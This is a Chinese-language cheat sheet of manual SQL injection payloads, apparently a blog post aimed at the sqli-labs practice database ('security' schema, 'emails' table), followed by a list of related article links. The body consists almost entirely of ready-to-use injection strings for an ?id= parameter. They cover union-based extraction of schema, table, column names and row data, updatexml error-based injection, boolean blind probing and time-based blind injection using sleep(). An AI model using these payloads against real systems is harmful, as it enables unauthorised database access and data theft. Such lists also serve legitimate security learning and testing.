sql注入手注语句


  
?id=100 'union select 1,database(),3-- asd
​
?id=100 'union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 0,1-- asd
?id=100 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- asd
​
?id=100 'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'limit 0,1-- asd
?id=100 'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security'and table_name='emails'-- asd
​
?id=-7' union select 1,group_concat(id),3 from emails -- asd
​
​
//updatexml
​
?id=1" and updatexml(1,concat(0x7e,(select database())),3)-- asd
​
?id=1" and updatexml (1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),3)-- asd
​
?id=1" and updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='emails'),0x7e),3)-- asd
​
?id=1" and updatexml (1,concat(0x7e,(select group_concat(id) from emails),0x7e),3)-- asd
​
?id=1'and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 -- asd
​
//布尔盲注
?id=1'and length(database())=8-- asd
​
?id=1'and ascii(substr(database(),1,1))=115 -- asd
​
?id=1' and(select count(table_name) from information_schema.tables where table_schema= database() )=4-- asd //查看库里有几个表
​
?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6-- asd//看第一个表名长度
​
?id=1'and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 -- asd//爆表名
​
?id=1'a nd (ascii(substr((select column_name from information_schema.columns where table_schema='security'and table_name='emails' limit 0,1),1,1)))=105 -- asd
​
?id=1'and (ascii(substr((select id from emails limit 0,1),1,1)))=4-- asd
​
//延时注入
?id=1'and if((length(database())=8),sleep(5),1)-- asd
​
?id=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- asd
​
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- asd
​
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security'and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- asd
​
?id=1'and if((ascii(substr((select id from emails limit 0,1),1,1))=49),sleep(5),1)-- asd

相关推荐

  1. sql注入语句

    2024-05-04 14:38:03       13 阅读
  2. SQL布尔盲、延迟注入和堆叠注入

    2024-05-04 14:38:03       29 阅读
  3. SQL注入攻击 - 基于时间的盲

    2024-05-04 14:38:03       46 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-05-04 14:38:03       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-05-04 14:38:03       20 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-05-04 14:38:03       20 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-05-04 14:38:03       20 阅读

热门阅读

  1. Shell脚本基础知识

    2024-05-04 14:38:03       11 阅读
  2. Rust入门篇:你好,世界

    2024-05-04 14:38:03       10 阅读
  3. matlab绘制热点图

    2024-05-04 14:38:03       12 阅读
  4. 双指针算法

    2024-05-04 14:38:03       17 阅读
  5. AT_abc348_d [ABC348D] Medicines on Grid 题解

    2024-05-04 14:38:03       17 阅读
  6. PostgreSQL自带的命令行工具06- pg_isready

    2024-05-04 14:38:03       12 阅读
  7. u-boot引导加载程序的命令列表

    2024-05-04 14:38:03       12 阅读
  8. 边缘计算概述_2.边缘计算的特点

    2024-05-04 14:38:03       13 阅读
  9. 牛客Xorto

    2024-05-04 14:38:03       11 阅读
  10. 附录C:招聘流程

    2024-05-04 14:38:03       12 阅读